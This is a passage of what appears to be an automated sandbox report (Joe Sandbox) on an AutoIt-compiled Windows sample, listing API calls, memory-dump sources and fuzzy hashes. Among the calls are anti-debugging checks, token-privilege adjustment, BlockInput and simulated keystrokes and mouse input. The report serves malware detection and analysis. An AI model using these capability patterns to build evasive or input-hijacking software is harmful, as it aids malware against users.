                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00E9A6BA
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                                                                                                                                    • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                                                    • Opcode ID: e031e1375316c1a75e7d6ef8c79856637233ded5075240fbbf6dcc2be48d30d1
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6803c7fc5d811cd4769814390ed6cb4c4b2a33badb6a4720b90e2d5564ab50ef
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e031e1375316c1a75e7d6ef8c79856637233ded5075240fbbf6dcc2be48d30d1
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA417F7190420AAFDF14DFA4DC49AEEBBF8EF05314F185165E805B21A2EB309E44CFA1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EA3AD7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA3AAB: _wcslen.LIBCMT ref: 00EA3AF8
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EA22BA
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA22E1
                                                                                                                                                                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00EA2338
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00EA2343
                                                                                                                                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00EA2372
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5669693d4c2142d9629925bd05ce4bfc877f307a9d6971e318d682f29267fa2a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2db464ff9638b15df81041c8efaa78e9b157449dfd4df15947f501da9af2c3b7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5669693d4c2142d9629925bd05ce4bfc877f307a9d6971e318d682f29267fa2a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A51E371A00210AFEB14AF28D886F6A77E5AB49718F08909CF9457F3D3D770AC41CBA1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4057b4e685671144ec199daebd4833977a6fa68a196f7ac951ceb424b36ae86a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7d6812c0fb8f7d58fa96a716eca15ba7a3c28138f3aebe43499ff1914ae61e92
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4057b4e685671144ec199daebd4833977a6fa68a196f7ac951ceb424b36ae86a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 622102357002208FD7119F26C844B9B7BE4EF85328F18906EE949AB351DF71EC42CB94
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00E9D8CE
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00E9D92F
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00E9D943
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ed813625763814847bc5cac74e5698599a9d77a2b888087d9f9015eaf7777af7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3e0183d0cc5fcdaf51846c6fc5c487165d7a77c1ddf097411f60bc4ae98cfc37
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed813625763814847bc5cac74e5698599a9d77a2b888087d9f9015eaf7777af7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53219071508715AFEB30AF66DC44BAB77FCEB81318F105429E646B2252E7B4EA04CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00E646AC), ref: 00E8E482
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00E8E491
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E8E4A2
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E8E4AE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2695905019-0
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00E52A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00E52A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00E52AA1
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
  • Part of subcall function 00E4014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00E409D8
  • Part of subcall function 00E4014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00E409F5
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8205A
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E82087
• GetLastError.KERNEL32 ref: 00E82097
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
APIs
• GetCurrentProcess.KERNEL32(?,?,00E4502E,?,00EE98D8,0000000C,00E45185,?,00000002,00000000), ref: 00E45079
• TerminateProcess.KERNEL32(00000000,?,00E4502E,?,00EE98D8,0000000C,00E45185,?,00000002,00000000), ref: 00E45080
• ExitProcess.KERNEL32 ref: 00E45092
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E8ED04
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                                                                                                                                                                    • String ID: DOWN
                                                                                                                                                                                                                                                                                                    • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00E7E664
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                                                                                                                    • String ID: X64
                                                                                                                                                                                                                                                                                                    • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EA52EE,?,?,00000035,?), ref: 00E94229
                                                                                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EA52EE,?,?,00000035,?), ref: 00E94239
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E8BC24
                                                                                                                                                                                                                                                                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E8BC37
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E81B48), ref: 00E81A20
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00E81B48), ref: 00E81A35
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5d6f761fe547ce3feb92538ad6612a2a92607529bd12f1059bf7dc4d6a5292f3
                                                                                                                                                                                                                                                                                                    • Instruction ID: b5ea5d271792aba5978ec6c703a6a8fb96a96ab1a888ab7aa942fbcfbe555f56
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d6f761fe547ce3feb92538ad6612a2a92607529bd12f1059bf7dc4d6a5292f3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1E04F72009610AFF7252B11FC05F7377E9EB04320F14896DF59990470EB726C91DB10
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • BlockInput.USER32(00000001), ref: 00E9F51A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf608f1cf23ba12cee0546e16847fc67e8c3786903c5349b5cd95b655eff9849
                                                                                                                                                                                                                                                                                                    • Instruction ID: 432fd3bedea2faec75548ee810df39f5e808f7135668d0ca8eb38a9fe25f49a6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf608f1cf23ba12cee0546e16847fc67e8c3786903c5349b5cd95b655eff9849
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03E048313002145FC710AF69E80499AF7EDAFA4761F018425F849E7351D670FD418B90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00E4075E), ref: 00E40D4A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 81204f7a9b42eda65af8ebcbf57a51b95ca1d2eae70ae6ee9c30428d9e0aa155
                                                                                                                                                                                                                                                                                                    • Instruction ID: eda2f06b9bee32ff45b8ba1cdd5b2e0eba93c1ed5e865f308124788a7467f4e2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81204f7a9b42eda65af8ebcbf57a51b95ca1d2eae70ae6ee9c30428d9e0aa155
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00EA358D
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00EA35A0
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00EA35AF
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00EA35CA
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00EA35D1
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00EA3700
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00EA370E
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA3755
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00EA3761
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EA379D
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA37BF
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA37D2
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA37DD
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00EA37E6
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA37F5
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00EA37FE
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA3805
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00EA3810
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA3822
                                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EC0C04,00000000), ref: 00EA3838
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00EA3848
                                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00EA386E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00EA388D
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA38AF
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA3A9C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
